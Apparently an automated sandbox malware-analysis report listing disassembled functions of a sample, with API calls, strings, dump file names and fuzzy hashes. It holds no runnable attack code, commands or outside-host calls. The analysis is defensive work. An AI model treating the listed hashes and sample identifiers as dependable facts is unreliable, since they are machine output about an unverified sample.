Instruction Fuzzy Hash: 5F41D335A11219ABEF21EF64CC49FEA77A9EF48750F100526F948E72C1D7709AA0CB90

Function 00212D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00212D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00212D53
_ValidateLocalCookies.LIBCMT ref: 00212DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00212E0C
_ValidateLocalCookies.LIBCMT ref: 00212E61

Strings

&H!, xrefs: 00212DFE, 00212E07, 00212E18
csm, xrefs: 00212DF6

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H!$csm
API String ID: 1170836740-1203824471
Opcode ID: 81a18ef58968da3c28ee4e8f20ffc96d1cf7537cf1e4a26bea05d3b7c8c19f9d
Instruction ID: 2692d57b5f9b39e8e0c8d20b199e1db69af310a6c7e3b0693714407734292007
Opcode Fuzzy Hash: 81a18ef58968da3c28ee4e8f20ffc96d1cf7537cf1e4a26bea05d3b7c8c19f9d
Instruction Fuzzy Hash: 03419034A20209EBCF10DF68D845ADEBBE5BF55324F148155F814AB392D731AAB9CF90

Function 0025C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0025C913

Strings

stop, xrefs: 0025C8E4
info, xrefs: 0025C8B4
blank, xrefs: 0025C895
warning, xrefs: 0025C8FC
question, xrefs: 0025C8CC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 75b7c043576db526789365b4513e2a8885d89dcc62ade56b15f0bf6cec52164a
Instruction ID: dc29da436d941e206b80eae79212b67c6d71521847b52e1608ec5a37964a3e36
Opcode Fuzzy Hash: 75b7c043576db526789365b4513e2a8885d89dcc62ade56b15f0bf6cec52164a
Instruction Fuzzy Hash: 18115B326B9307BEA7016B10DC86CFAA3DCCF15756B30002AFD04A62C2FBB45D64566C

Function 0025ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0025ED2A
_wcslen.LIBCMT ref: 0025ED3B
_wcslen.LIBCMT ref: 0025ED79
_wcslen.LIBCMT ref: 0025EDAF
_wcslen.LIBCMT ref: 0025EDDF
_wcslen.LIBCMT ref: 0025EDEF
_wcslen.LIBCMT ref: 0025EE2B
_wcslen.LIBCMT ref: 0025EE5A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 7c723f01a5fab461fb8e7b26d97425c59d95e91c2e9e17072d868a02617d1727
Instruction ID: 0a0ea8b7d86f9003b0521d3d87f03de0510d4a421136d4f98282d6214467e6c2
Opcode Fuzzy Hash: 7c723f01a5fab461fb8e7b26d97425c59d95e91c2e9e17072d868a02617d1727
Instruction Fuzzy Hash: AF416265C20118A5CB11FBB4888AACFB7ECAF55710F518562E918E3122EB34D3A5C7E9

Function 0020F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0024682C,00000004,00000000,00000000), ref: 0020F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0024682C,00000004,00000000,00000000), ref: 0024F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0024682C,00000004,00000000,00000000), ref: 0024F454

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5368b74744162523c94d5569d87994f38d468c4f65ea7434fc00d710f08a3ef7
Instruction ID: 5a8f8bbb226871b76ae853318b3739033df76a45b43796759b1c0b624ac82fc3
Opcode Fuzzy Hash: 5368b74744162523c94d5569d87994f38d468c4f65ea7434fc00d710f08a3ef7
Instruction Fuzzy Hash: BF412C312747C5BAD7B89F28EB8CB267B95AB86314F14443DE04752DE3D771A4A0CB11

Function 00282D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00282D1B
GetDC.USER32(00000000), ref: 00282D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00282D2E
ReleaseDC.USER32(00000000,00000000), ref: 00282D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00282D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00282D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00285A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00282DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00282DE1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ab089d0d8de950b5ee9beb63ce5d9a2cce24b86052a17cd5a2a5dba727c8a87e
Instruction ID: 275dc90c71ebf337462f220bae3a2ffa900733bf0443339604667bb455e5e83a
Opcode Fuzzy Hash: ab089d0d8de950b5ee9beb63ce5d9a2cce24b86052a17cd5a2a5dba727c8a87e
Instruction Fuzzy Hash: 2131AB7A212220BBEB148F50DC8AFEB3FADEF49711F144065FE089A291D6759C50CBB0

Function 00255622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00255637
_memcmp.LIBVCRUNTIME ref: 00255659
_memcmp.LIBVCRUNTIME ref: 00255671
_memcmp.LIBVCRUNTIME ref: 00255684
_memcmp.LIBVCRUNTIME ref: 0025569E
_memcmp.LIBVCRUNTIME ref: 002556B1
_memcmp.LIBVCRUNTIME ref: 002556C9
_memcmp.LIBVCRUNTIME ref: 002556E4

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 10a316efb60174730e809ce33e1b9ca1bb44dcfc89fc1db6494134df452b85dd
Instruction ID: 0a37f686d7b7f6507fdb414554f3bfa95dc63214d4a5f064342d34622b4afbfd
Opcode Fuzzy Hash: 10a316efb60174730e809ce33e1b9ca1bb44dcfc89fc1db6494134df452b85dd
Instruction Fuzzy Hash: 00214F6177192DB7D2046D114EA2FFA339CAF25346F500021FE045A589F770EE3486AD

Function 00274FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00275007
NULL Pointer assignment, xrefs: 0027502E, 00275383

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: de7f57154f265b0e6642570fd4c55b21020d454bcbce5c9ec67bbe33a698fccc
Instruction ID: 5db1b6061af0ca72524f78d51f8ff447b717cfe02d61190aa991461fea8668e0
Opcode Fuzzy Hash: de7f57154f265b0e6642570fd4c55b21020d454bcbce5c9ec67bbe33a698fccc
Instruction Fuzzy Hash: 95D1D371A1061A9FDF10CFA8C881BAEB7B5FF48344F14C069E919AB291E7B0DD55CB60

Function 00231522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002317FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002315CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00231651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002317FB,?,002317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002316E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002316FB

Part of subcall function 00223820: RtlAllocateHeap.NTDLL(00000000,?,002C1444,?,0020FDF5,?,?,001FA976,00000010,002C1440,001F13FC,?,001F13C6,?,001F1129), ref: 00223852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00231777
__freea.LIBCMT ref: 002317A2
__freea.LIBCMT ref: 002317AE

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0439ae8ae2e32b102d52c3f56111d6601168e2f02fe1e52c4b5cabb0a16dd897
Instruction ID: 64a7e551490fcea1333af04531f6addf12c259b535432449401fb2186503b6f2
Opcode Fuzzy Hash: 0439ae8ae2e32b102d52c3f56111d6601168e2f02fe1e52c4b5cabb0a16dd897
Instruction Fuzzy Hash: 2391C5B1E302169ADF208FB4DC81AEEBBB59F49310F584659E805E7281D735CC70CB60

Function 00274523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00274648
VariantInit.OLEAUT32(?), ref: 00274749
VariantClear.OLEAUT32(?), ref: 00274753
VariantClear.OLEAUT32(?), ref: 002747B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 002745D8, 00274706, 002747BE
Incorrect Object type in FOR..IN loop, xrefs: 0027472C

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 36b1a92a76a572311ad96c74d1614b47a2ef9643c335e5e1f87c8b26da598112
Instruction ID: e7b7d9cc2970e099248e37d729519c9e8f4b1b1936a6493ab2f2aa133248b012
Opcode Fuzzy Hash: 36b1a92a76a572311ad96c74d1614b47a2ef9643c335e5e1f87c8b26da598112
Instruction Fuzzy Hash: 5B91B270A20219AFDF24DFA5C884FAEBBB8EF46714F10C559F509AB281D7709951CFA0

Function 00261187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0026125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00261284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002612A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002612D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0026135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002613C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00261430

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 70eaf3e6882e42e70877871e7a85025689e39fd813f66368bcec8fd87bc66274
Instruction ID: 7d7d5fc3bcaf9d2f8c48d36708ed31ba171aa11254f39b7450d6c9b3a265fa62
Opcode Fuzzy Hash: 70eaf3e6882e42e70877871e7a85025689e39fd813f66368bcec8fd87bc66274
Instruction Fuzzy Hash: 84910175A202199FEB00DFA4D884BBEB7B5FF45314F184029E901EB291DB74B9B1CB90

Function 0020948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ce72b5449e18bd7cee0fbcc99e6ce85ec07a884d7e23ed27eab15d3a58541612
Instruction ID: a49dda8c7ab3aa120ccffb3657015381fdf1e5d952265f596422602e6b181bb3
Opcode Fuzzy Hash: ce72b5449e18bd7cee0fbcc99e6ce85ec07a884d7e23ed27eab15d3a58541612
Instruction Fuzzy Hash: 2291287191021AAFCB14CFA9CC84AEEBFB8FF49320F144055E516B7292D374A991CB60

Function 00273947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0027396B
CharUpperBuffW.USER32(?,?), ref: 00273A7A
_wcslen.LIBCMT ref: 00273A8A
VariantClear.OLEAUT32(?), ref: 00273C1F

Part of subcall function 00260CDF: VariantInit.OLEAUT32(00000000), ref: 00260D1F
Part of subcall function 00260CDF: VariantCopy.OLEAUT32(?,?), ref: 00260D28
Part of subcall function 00260CDF: VariantClear.OLEAUT32(?), ref: 00260D34

Strings

AUTOIT.ERROR, xrefs: 00273A80, 00273A85
Incorrect Parameter format, xrefs: 002739A6, 00273BA1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 035f6c3ef0c4dd590ce8f789faa5788c485255078ae9d2c12e3e4fdf2131d98b
Instruction ID: 520c72caa0f9cd84335cd437cb994dd0e85983e10cc4195645a503a4be65e825
Opcode Fuzzy Hash: 035f6c3ef0c4dd590ce8f789faa5788c485255078ae9d2c12e3e4fdf2131d98b
Instruction Fuzzy Hash: 4A9154756283059FC704EF24C48196AB7E4FF89314F14886EF88A9B351DB30EE55DB92

Function 00274BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0025000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?,?,?,0025035E), ref: 0025002B
Part of subcall function 0025000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?,?), ref: 00250046
Part of subcall function 0025000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?,?), ref: 00250054
Part of subcall function 0025000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0024FF41,80070057,?), ref: 00250064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00274C51
_wcslen.LIBCMT ref: 00274D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00274DCF
CoTaskMemFree.OLE32(?), ref: 00274DDA

Strings

NULL Pointer assignment, xrefs: 00274E23, 00274E52

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 893e58832972eefb4d1089fbd3f19961cf903d49151c9874cbdb2e2acd520398
Instruction ID: e64db55638734d4e17f97ca2fa3befd47116283d1a84ccf8662248036b4fda6c
Opcode Fuzzy Hash: 893e58832972eefb4d1089fbd3f19961cf903d49151c9874cbdb2e2acd520398
Instruction Fuzzy Hash: 03913971D1021D9FDF14EFA4D881AEEB7B8FF08314F10816AE919A7241DB709A54CF60

Function 002820FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00282183
GetMenuItemCount.USER32(00000000), ref: 002821B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002821DD
_wcslen.LIBCMT ref: 00282213
GetMenuItemID.USER32(?,?), ref: 0028224D
GetSubMenu.USER32(?,?), ref: 0028225B

Part of subcall function 00253A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00253A57
Part of subcall function 00253A3D: GetCurrentThreadId.KERNEL32 ref: 00253A5E
Part of subcall function 00253A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002525B3), ref: 00253A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002822E3

Part of subcall function 0025E97B: Sleep.KERNEL32 ref: 0025E9F3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 59b531d3caf287db88dd22d872a4188cf2642155a096f28aa7d809c9617e64b9
Instruction ID: 79db813120a1ea6c72cd7851e1d5670828fa891f4b450e9c9cafe0cc2dd511ea
Opcode Fuzzy Hash: 59b531d3caf287db88dd22d872a4188cf2642155a096f28aa7d809c9617e64b9
Instruction Fuzzy Hash: 9971B139A10205EFCB10EF64C845AAEB7F5EF48310F108459E916EB385D734ED558F90

Function 0025AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0025AEF9
GetKeyboardState.USER32(?), ref: 0025AF0E
SetKeyboardState.USER32(?), ref: 0025AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0025AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0025AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0025AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0025B020

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 60b35027106fcefe9b17d014664d9a2cfcc1aa64f803458021618986bcc7323d
Instruction ID: f17aa86cc13c5610d29ff653ba2282c78739a6c9d981323459f0dce60f19917c
Opcode Fuzzy Hash: 60b35027106fcefe9b17d014664d9a2cfcc1aa64f803458021618986bcc7323d
Instruction Fuzzy Hash: F15106A09243D23DFB3746348C06BBABE995B06305F088589E9D9458C2D3F9DCECD765

Function 0025ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0025AD19
GetKeyboardState.USER32(?), ref: 0025AD2E
SetKeyboardState.USER32(?), ref: 0025AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0025ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0025ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0025AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0025AE38

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
